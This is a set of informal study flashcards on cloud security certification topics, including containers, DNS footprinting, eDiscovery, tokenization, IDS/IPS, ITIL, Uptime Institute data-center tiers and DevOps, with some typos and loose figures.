a type of virtualization that allows for shared operating systems for more resource savings and faster execution. the container is a special computing environment that is somewhat isolated from the rest of the software running on its hosting server. the general idea behind the containers is that an application or service can be packaged along with all of its dependencies into an image and deployed to almost any environment, where it can run independently of any other containers or installed applications. Most containers are Linux-based and therefore need an underlying Linux OS with a kernel that is compatible with the containers' software components. Docker, which is a platform for creating and hosting containers, is available in different implementations intended for the different host OS. when you install Docker on a windows-based server, it quietly creates a Linux-based Hyper -V VM and runs Linux-based containers in that VM, thereby creating an illusion that the same container can run on different hosts OS. a similar model is used to run Windows-based containers on Linux servers as well as in some other situation where a container is not directly compatible with the host OS's kernel. simply puts, Container can run on both Windows and Linux, even though the container is mostly Linux based. The OS does not need to match because the container can be run in a guest OS as Virtual machine. particularly useful in multi-cloud and hybrid deployments.

Footprinting

also known as reconnaissance, is a process of gathering informaiton about a potential target of an attack. DNS footprinting refers to learning all the records in a DNS zone. considering that DNS on the internet is essentially a public service, it is next to impossible to prevent DNS footprinting. DNSSEC is intended to prevent unauthorized changes to DNS data but does not restrict read access to it and, therefore, cannot prevent DNS footprinting.

Kubernetes

an open source system for automating deployment, scaling, and management of containerized applications Kubernetes is a container orchestrations system.

NFPA (National Fire Protection Association)

an organization dedicated to establishing fire safety standards for all public sectors, including healthcare NFPA is an international nonprofit organization. among other documents, it published standards pertaining to design in general and fire safety in particular of various types of buildings, including data centers. FM-200 is a fire-suppressant agent. it is a colorless nontoxic gas that does not leave any film or residue and does not harm the environment. Halon is a fire-suppressant agent. it was widely used in the past, but its production and import were banned in 1994 because it destroys Earth's Ozone layer. Ionization is a physical phenomenon that involves the transformation of electrically neutral molecules into electrically charged ions. one of two common types of smoke detectors is based on ionization produced by a small piece of radioactive material. the other type of smoke detector uses the photoelectric effect-- the ability of certain materials to produce an electric current when they are illuminated by light.

eDiscovery vs Legal Hold

eDiscovery is more focused on the process of forensically collecting, securing, and analyzing data that comes out of a legal hold notice. Legal Hold is the actual process of preserving the requested data. The responding party is a term describing the person or group who receives an eDiscovery order and is responsible for providing digital evidence. Data Discovery methods: 1. Labels 2. Content 3. Metadata eDiscovery process: 1. Identification - scope of what are you collecting 2. Preservation - data identified as potentially relevant is placed in a legal hold 3. collection - transfer of data from a company to legal counsel 4. processing - preparation for loading into a document review platform 5. review - documents are reviewed for responsiveness to discovery requests 6. production -documents are turned over to opposing counsel 7. presentation - documents are displayed before audiences. ISO/IEC related to forensics : 27037 - Guideline for identification, collection, acquisition, and preservation of digital evidence 27041 guidance on assuring suitability and adequacy of incident investigation method 27042 guidelines for the analysis and interpretation of digital evidence 27043 incident investigation principles and processes 27050 code of practice for electronic discovery (eDiscovery)

Basic Storage Encryption

encryption engine is located at the management level and CSP holds keys. Protects from the hardware theft or loss. Does not protect from CSP admin accessing the data (cuz they have the keys lol)

Architecture, Threat, Attack Surfaces, and Mitigations (ATASM)

is a threat-modeling approach that highlights the importance of structural understanding of a system for the purpose of thread modeling architecture. the architecture is broken apart into its logical and functional components (decomposing and factoring) to discover all potential attackable surfaces (input and outputs of the system). Decomposition is also used to define those points at which defenses will be built (mitigations are places at defensible boundaries).

Tokenization

it involves replacing sensitive data with opaque tokens and mapping those tokens back to the original data so that the original data can be restored when necessary. Requires 2 separate databases, that mirror the original database and are mapped to the original data using a tokenization engine.

Public Cloud

most often ensure have the highest levels of availability among the various cloud deployment models because they tend to be large infrastructures with geographically dispersed resources.

VM Sprawl

occurs when an organization has many VMs that aren't managed properly VM sprawl is the uncontrolled growth of virtual machines to the point where the cloud administrator can no longer effectively manage and secure them.

IDS and IPS appliances

operate using deep packet analysis. Cannot examine encrypted traffic. Operate via signature-based or anomaly detection methods. Know for false positives when they're first installed The main difference between them is that the primary purpose of an IDS is to merely notify IT personnel of any detected suspicious activity, whereas an IPS is also proposed to actively prevent attacks from happening or disrupt them. IDS and IPS can analyze traffic at layer 7. IPS can detect attacks based on the signatures of know types of attacks, past behaviors on the network, and some other factors that an IT administrator might specify in the IPS' rule

Data Custodian

the CSP is typically the data custodian, AKA data processor. They are generally the party that technically stores, handles, and moves the data on behalf of the data owner.

Dynamic Optimization

the automated process of reallocating cloud resources to ensure that no physical resources become over or under utilized Dynamic optimization is the automated processes of ensuring that resources are used efficiently and remain highly available

ITIL (IT Infrastructure Library)

the framework that focuses on IT service mgmt. expertise. Closely aligns with ISO 20000-1 ITIL (12): 1. Availability management 2. CApacity Management 3. Change Management 4. configuration management 5. continual service improvement management 6. continuity management 7. deployment management 8. an incident management 9. information security management 10. problem management 11. release management 12. service level management problem management involves constantly monitoring and analyzing the environment with the goal of anticipating potential problems and taking the necessary steps to prevent them from happening. one a problem that affects or can affect occurred, it is referred to an as incident and is addressed in accordance with the processes outlined in the incident management component.

Escalation of privilege Attack

this attack is the type of attack where a perpetrator attempts to acquire more authority than he/she should normally have or than he/she has already managed to acquire in an earlier phase of the attack. Technical control can prevent the Escalation of privilege. this type of risk can usually be reduced through more thorough access control, more stringent authentication requirements for high-privilege operations, detailed logging and regular log reviews by trained security administrators, and also monitoring logs with an automated analytics solution.

VM Introspection (VMI)

tools that can be used to capture a running memory that is currently running on Hypervisor's virtual machine. Uses tools installed on the hypervisor to retrieve pages of memory for analysis. It allows cloud providers to monitor their guest OS during runtime.

Uptime Institute

uptime Institute is a professional services organization that has created a four-tier data-center certification standard. Each tier defines criteria for the basic aspects of data centers, such as power, cooling, maintenance, and fault tolerance. The higher the tier, the more reliable a data center is: Tier 1: Basic *is suitable for a typical office environment * must be shut down for maintenance * can withstand brief power outages. *99.671% uptime * no redundancy needed * 28.8Hs of downtime per year Tier 2: Redundant capacity components *Can support a critical environment * some maintenance can be done without disruption * Has a better tolerance for utility outages 99.749% Uptime *Partial redundancy in power and cooling *up to 22Hs of downtime per year Tier 3: Concurrently maintainable *suitable for financial institute pieces of equipment are hot swap-able * can support critical environment * Need not be shut down for maintenance * Has a better tolerance for utility outage * no more than 1.6Hs of downtime per year * 99.982% * N+1 fault tolerant providing at least 72-Hours outage protection Tier 4: Fault-tolerant * can support a life-critical environment * need not be shut down for maintenance * can withstand a range of equipment failures *Fully Redundant Data Center *99.995% uptime per year *2N+1 fully redundant infrastructure *96 hours of power outage protection *26.3 minutes of annual downtime.

Resource Contention

when there are too many requests and not enough resources available to satiety them

Resources Exhaustion

when you are sending too many requests in a short period of time.

X.500 vs X.509

x.500 Directory x.509 PKI (public and private keys)

DevOps (Development and Operations)

•Decrease the deployment time for newly developed applications and maximize profit by rapidly addressing market opportunities and getting customer feedback in a timely manner •Development and operations are working in parallel streams within a DevOps culture *A model for accelerated software development and deployment DevOps is a concept that refers to a software development and delivery model. Under the traditional model, a team of developers creats and appliation and an operations team deloys it into production and subsequently installs updates and performs other types of maintenance. Under the DevOPs model, a joined team of developers and operations personnel implements virtually continuous delivery of the software. this is accompohsed through the automasion of most of the process and close collaboration between the development and operations personnel. DevOps feastures the agile development style with short cycles and frequent updates. Security has become significantly more important nowadays. therefore, all security issues should be considered from the very beginning of the development process, as opposed to being added at the end of the development cycle. this new approach in relation to DevOps is often referred to as DevSecOps.


Set pelajaran terkait

Unit 8: Explain the function of plot and structure. Quiz

View Set

Real Property - Restrictive Covenants

View Set

Nursing Management of Shock States

View Set

Accounting 311 Multiple Choice-Chapter 19

View Set

MGT 247 FINAL EXAM practice questions

View Set

Abnormal Psychology: Chapter One

View Set